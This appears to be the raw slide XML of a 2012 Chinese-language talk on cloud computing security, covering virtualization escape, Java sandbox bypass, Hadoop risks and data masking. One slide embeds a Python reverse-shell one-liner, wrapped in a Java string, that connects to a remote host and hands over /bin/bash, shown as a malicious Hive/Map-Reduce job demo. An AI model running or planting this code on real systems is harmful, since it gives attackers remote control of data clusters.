              <a:t>的边信道攻击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0B927-BAF2-4C05-8F7A-D3D40F84868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0B927-BAF2-4C05-8F7A-D3D40F84868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0B927-BAF2-4C05-8F7A-D3D40F84868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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3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http://schierlm.users.sourceforge.net/TypeConfusion.html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http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx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0B927-BAF2-4C05-8F7A-D3D40F84868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自动化防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ddos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0B927-BAF2-4C05-8F7A-D3D40F84868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自动化防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ddos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0B927-BAF2-4C05-8F7A-D3D40F84868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随时随地能使用的服务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0B927-BAF2-4C05-8F7A-D3D40F84868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自动化防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ddos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0B927-BAF2-4C05-8F7A-D3D40F84868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add jar</a:t>
            </a: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Create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temperary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function</a:t>
            </a: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hive&gt;select test(data) from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table_x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0B927-BAF2-4C05-8F7A-D3D40F84868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Sergey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Brin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/2012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0B927-BAF2-4C05-8F7A-D3D40F84868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D5920-620B-4FDD-860C-8691FC803AC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1875</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年，法国巴黎北火车站建成世界上第一座发电厂，为附近照明供电。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1961</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年，人工智能之父麦肯锡在一次会议上提出了“效用计算”（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>utility computing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）这个概念，其核心借鉴了上面所提到的电厂模式，具体目标是整合分散在各地的服务器、存储系统以及应用程序来共享给多个用户，让用户能够像把灯泡插入灯座一样来使用计算机资源，并且根据其所使用的量来付费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JeffBarr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表示，云计算服务成熟的标志是亚马逊在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2006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年推出的简单存储服务（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）和弹性计算云（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D5920-620B-4FDD-860C-8691FC803AC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D5920-620B-4FDD-860C-8691FC803AC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D5920-620B-4FDD-860C-8691FC803AC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D5920-620B-4FDD-860C-8691FC803AC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安全风险没变，但业务更复杂了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D5920-620B-4FDD-860C-8691FC803AC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34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t.qq.com/aullik5" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://weibo.com/n/aullik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i.baidu.com/new/aullik5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http://blog.jobbole.com/wp-content/uploads/2012/07/cloud-comput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00808"/>
            <a:ext cx="4743400" cy="47434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5540152" cy="1470025"/>
          </a:xfrm>
        </p:spPr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深入浅出云计算安全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84168" y="5373216"/>
            <a:ext cx="2836912" cy="122413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吴翰清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2012-07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835696" y="620688"/>
            <a:ext cx="5400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两种云计算</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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2420888"/>
            <a:ext cx="2016224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弹性计算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136" y="2420888"/>
            <a:ext cx="216024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海量数据计算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645024"/>
            <a:ext cx="3358191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3789040"/>
            <a:ext cx="4049681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19672" y="404664"/>
            <a:ext cx="5832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弹性计算改变建站方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="图示 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619672" y="1556792"/>
          <a:ext cx="5904656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556792"/>
            <a:ext cx="8361319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339752" y="332656"/>
            <a:ext cx="47525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互联网的长尾用户</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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2160" y="5157192"/>
            <a:ext cx="2664296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中小站长、创业者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2348880"/>
            <a:ext cx="396044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运营商、政府、公安、金融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27784" y="2132856"/>
            <a:ext cx="367240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“奢侈品”变成“消费品”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628800"/>
            <a:ext cx="2288254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1988840"/>
            <a:ext cx="2384167" cy="276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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="476672"/>
            <a:ext cx="59046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弹性计算冲击安全产业</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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95736" y="4365104"/>
            <a:ext cx="468052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“销售模式”变成“互联网模式”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475656" y="332656"/>
            <a:ext cx="63367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4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Security as a Service</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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28" name="AutoShape 4" descr="http://t3.baidu.com/it/u=3178753603,730218808&amp;fm=5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196752"/>
            <a:ext cx="1502447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1340768"/>
            <a:ext cx="2880320" cy="1677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4720185"/>
            <a:ext cx="4680520" cy="2137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下箭头 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707904" y="3356992"/>
            <a:ext cx="1152128" cy="108012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形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="1556792"/>
            <a:ext cx="1368152" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 3959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http://video.libertytimes.com.tw/media/fck/image/%E8%B6%85%E5%BC%B7%E6%B5%B7%E5%98%AF%E6%B7%B9%E6%B2%92%E6%B5%B7%E9%9B%B2%E8%87%BA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331640" y="1844824"/>
            <a:ext cx="691276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结论：变革的浪潮就在眼前</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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28" name="AutoShape 4" descr="http://t3.baidu.com/it/u=3178753603,730218808&amp;fm=5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835696" y="404664"/>
            <a:ext cx="55446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弹性计算的安全挑战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="图示 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1691680" y="1916832"/>
          <a:ext cx="5328592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虚拟化技术安全问题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全虚拟化、半虚拟化、操作系统级虚拟化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虚拟机逃逸问题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(CVE-2011-1898)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D.O.S.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21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4139952" y="2924944"/>
            <a:ext cx="4104456" cy="2808312"/>
            <a:chOff x="1619672" y="2060848"/>
            <a:chExt cx="4104456" cy="2808312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1619672" y="4437112"/>
              <a:ext cx="4104456" cy="4320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dirty="0" smtClean="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>Hardware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 bwMode="auto">
            <a:xfrm>
              <a:off x="1619672" y="3933056"/>
              <a:ext cx="4104456" cy="4320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dirty="0" smtClean="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>Hypervisor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1619672" y="3068960"/>
              <a:ext cx="1080120" cy="79208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dirty="0" smtClean="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>Domain0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8" name="组合 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4644008" y="2060848"/>
              <a:ext cx="1080120" cy="1800200"/>
              <a:chOff x="4644008" y="2132856"/>
              <a:chExt cx="1080120" cy="1728192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="圆角矩形 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4644008" y="2132856"/>
                <a:ext cx="1080120" cy="172819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 bwMode="auto">
              <a:xfrm>
                <a:off x="4644008" y="2132856"/>
                <a:ext cx="1080120" cy="79208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r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                    <a:latin typeface="Arial" charset="0"/>
                    <a:ea typeface="宋体" charset="-122"/>
                  </a:rPr>
                  <a:t>Guest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r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-C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rPr>
                  <a:t>OS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644008" y="3212976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Domain U</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US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2843808" y="3284984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10" name="下箭头 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5364088" y="2852936"/>
              <a:ext cx="360040" cy="1224136"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
                <a:alpha val="28000"/>
              </a:schemeClr>
            </a:solidFill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1" name="手杖形箭头 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1979712" y="2852936"/>
              <a:ext cx="3384376" cy="1440160"/>
            </a:xfrm>
            <a:prstGeom prst="uturnArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 18721"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 17604"/>
                <a:gd name="adj4" fmla="val 34350"/>
                <a:gd name="adj5" fmla="val 53907"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="35000"/>
              </a:srgbClr>
            </a:solidFill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2" name="组合 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3491880" y="2060848"/>
              <a:ext cx="1080120" cy="1800200"/>
              <a:chOff x="4644008" y="2132856"/>
              <a:chExt cx="1080120" cy="1728192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="圆角矩形 12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4644008" y="2132856"/>
                <a:ext cx="1080120" cy="172819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4" name="圆角矩形 13"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4644008" y="2132856"/>
                <a:ext cx="1080120" cy="79208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r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                    <a:latin typeface="Arial" charset="0"/>
                    <a:ea typeface="宋体" charset="-122"/>
                  </a:rPr>
                  <a:t>Guest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r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-C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charset="-122"/>
                  </a:rPr>
                  <a:t>OS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644008" y="3212976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Domain U</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="圆角矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1619672" y="4293096"/>
            <a:ext cx="1728192" cy="144016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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Host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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>xx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0" name="手杖形箭头 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2555776" y="4941168"/>
            <a:ext cx="1944216" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14302"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 18534"/>
              <a:gd name="adj4" fmla="val 34350"/>
              <a:gd name="adj5" fmla="val 50977"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="35000"/>
            </a:srgbClr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1" name="手杖形箭头 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6372200" y="3717032"/>
            <a:ext cx="1152128" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14302"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 18534"/>
              <a:gd name="adj4" fmla="val 34350"/>
              <a:gd name="adj5" fmla="val 50977"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0">
              <a:alpha val="35000"/>
            </a:srgbClr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XEN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DOS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7544" y="1556792"/>
          <a:ext cx="8435280" cy="4637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5076056" y="3284984"/>
            <a:ext cx="3312368" cy="32403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AppEngine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的环境安全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3356992"/>
            <a:ext cx="3456384" cy="1440160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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Java sandbox</a:t>
            </a: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PHP sandbox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556792"/>
            <a:ext cx="398711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127000"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="圆角矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5868144" y="3861048"/>
            <a:ext cx="1728192" cy="17281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12160" y="450912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语言级沙箱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6176" y="58052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系统级沙箱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916832"/>
            <a:ext cx="403244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Who am I?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Alibaba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security </a:t>
            </a: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(7 years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(3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个月，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1w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IMG_9872_meitu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6016" y="1484784"/>
            <a:ext cx="3816424" cy="4856193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7070" y="2996952"/>
            <a:ext cx="1995001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CVE-2012-0507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Attacking java security manager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852936"/>
            <a:ext cx="78566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725144"/>
            <a:ext cx="914400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59" y="0"/>
            <a:ext cx="814090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突破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java sandbox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759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268760"/>
            <a:ext cx="8496944" cy="338437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759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4869160"/>
            <a:ext cx="7976271" cy="172819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弹性计算的网络安全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403648" y="1772816"/>
          <a:ext cx="6336704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907704" y="476672"/>
            <a:ext cx="5400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海量数据</a:t>
            </a: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计算的安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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73730" name="Picture 2" descr="http://tech.shopzilla.com/wp-content/uploads/2011/06/hadoop-security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556791"/>
            <a:ext cx="4392488" cy="4243057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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860032" y="6021288"/>
            <a:ext cx="3672408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以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hadoop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为例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123728" y="188640"/>
            <a:ext cx="48965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4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Map-Reduce</a:t>
            </a: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简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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2050" name="Picture 2" descr="http://www.kuqin.com/upimg/allimg/110827/21003J460-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999720"/>
            <a:ext cx="7056784" cy="585828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31640" y="476672"/>
            <a:ext cx="64807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海量数据计算的安全挑战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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1835696" y="2060848"/>
          <a:ext cx="5328592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互联网公司使用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的方式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412776"/>
            <a:ext cx="3097311" cy="5266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251520" y="1916832"/>
          <a:ext cx="4536504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共享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”gateway”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的问题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17440"/>
            <a:ext cx="9150555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0" y="1340768"/>
            <a:ext cx="12241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/home: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Hacking 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Hadoop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icloud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是云吗？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628800"/>
            <a:ext cx="7704856" cy="4321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Map-Reduce job/UDF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77072"/>
            <a:ext cx="914400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内容占位符 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1547664" y="1556792"/>
          <a:ext cx="5616624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cloud sec\connback_cod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0"/>
            <a:ext cx="614641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72816"/>
            <a:ext cx="7200800" cy="252027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String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pysh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= "#!/bin/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sh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\r\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npython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-c \"import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os;import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sys;import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socket;s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socket.socket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socket.AF_INET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socket.SOCK_STREAM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s.connect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socket.gethostbyname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('10.x.x.x'),9999));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s.send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('Welcome my master\\r\\n');os.dup2(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s.fileno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(), 0);os.dup2(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s.fileno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(), 1);os.dup2(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s.fileno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(), 2);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s.send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('Is there a shell?\\r\\n');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os.system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('/bin/bash');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s.close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s.send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('See u next time!\\r\\n');\"";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581128"/>
            <a:ext cx="6408712" cy="804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DEMO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如何解决隐私问题？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024" y="1556792"/>
            <a:ext cx="8784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张三     男   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13307491234  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北京市一号胡同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李四     女   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13466655678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   天津市二号小区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http://www.samto.cn/pic-aHR0cDovL2ltZzA1LnRhb2Jhb2Nkbi5jb20vYmFvL3VwbG9hZGVkL2k1L1QxVldpZlhtRmtYWGJuc00yYl8xMjM5MTIuanBnXzMxMHgzMTAuanB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284984"/>
            <a:ext cx="3384376" cy="3384377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst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Data Masking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 descr="http://space.tv.cctv.com/image/20080521/IMAG121137048873046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628800"/>
            <a:ext cx="6120680" cy="4590510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:softEdge rad="635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保留统计信息，掩盖个人信息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2060848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张</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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     男    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1330749</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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xxxx</a:t>
            </a:r>
          </a:p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李</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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     女    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1346665</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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yyyy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717032"/>
            <a:ext cx="7812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北京市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ABCD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胡同 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43010419990909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MMM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天津市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EFGH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小区  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42010519880808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NNN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115616" y="1124744"/>
          <a:ext cx="7200800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Question?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联系我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微博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hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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 smtClean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weibo.com/n/aullik5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t.qq.com/aullik5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博客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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://hi.baidu.com/new/aullik5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school.discoveryeducation.com/clipart/images/thank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340768"/>
            <a:ext cx="6274983" cy="4392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互联网未来的入口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62" name="AutoShape 2" descr="data:image/jpeg;base64,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